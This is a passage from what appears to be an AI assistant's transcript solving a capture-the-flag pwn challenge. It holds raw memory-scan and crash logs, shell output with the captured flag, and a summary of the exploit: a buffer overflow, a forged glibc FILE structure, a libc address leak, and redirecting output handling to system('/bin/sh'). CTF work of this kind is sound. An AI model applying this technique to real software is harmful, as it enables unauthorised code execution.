\x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x4088f000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408a4000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408aa000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408b3000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408ba000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408d0000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408ed000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408f1000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' - **Assistant:** 0 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383001 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 1 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383010 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 2 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383013 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 3 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383016 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 4 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383019 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 5 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383025 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' - **Assistant:** 0x4092e01b 1083367451 0x4092e01b 1083367451 0x4092e01b 1083367451 - **Assistant:** payload newline? False system 0xff6f04cd str 0xff7b5a30 binsh 0xff798f2c old 0x7fbcc764 ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: uid=999(ctf) gid=999(ctf) groups=999(ctf) /home/ctf total 28 drwxr-xr-x 1 root ctf 4096 May 10 18:23 . drwxr-xr-x 1 root root 4096 May 10 18:23 .. -r--r----- 1 root ctf 43 May 10 15:48 flag -rwxr-x--- 1 root ctf 70 May 10 15:48 run.sh -rwxr-x--- 1 root ctf 10792 May 10 15:47 speed1 /proc/kpageflags /home/ctf/flag midnight{1f762ebc504b1d331c2d2ef8aafd0b67} midnight{1f762ebc504b1d331c2d2ef8aafd0b67} midnight{1f762ebc504b1d331c2d2ef8aafd0b67} /home/ctf/run.sh: line 2: 1383055 Segmentation fault (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1 - **Assistant:** Solved. Flag: ```text midnight{1f762ebc504b1d331c2d2ef8aafd0b67} ``` The bug was twofold: 1. The program reads decimal integers into a 16-word stack buffer without bounds. 2. Each input line is read with `fgets(..., 0x1024, ...)` into a global buffer at `0x22044`, which overflows into the copied `stdin` / `stdout` pointers in `.bss`. The stack canary blocks a normal return-address overwrite, so I used the global overflow instead. I overwrote the copied `stdout` pointer with a fake ARM glibc `FILE` object in `.bss`. The fake object used `_IO_str_jumps`; when the final `printf("res: %d")` ran, it entered `_IO_str_overflow`. For the remote libc base, I used the integer-sum overread with 27 nonzero integers. That overwrote the random stack words before a stable libc data pointer, producing: ```text res = libc_base + 0xf4000 + 27 ``` Remote base resolved to: ```text 0xff6c3000 ``` Then I set the fake `_IO_strfile` allocation callback to `system`, and chose the fake buffer size so `_IO_str_overflow` called: ```c system("/bin/sh") ``` After spawning the shell, I ran `cat /home/ctf/flag` and got the flag above. I also posted a sanitized progress note to the provided Discord webhook, without the flag. - **System:** Thread completed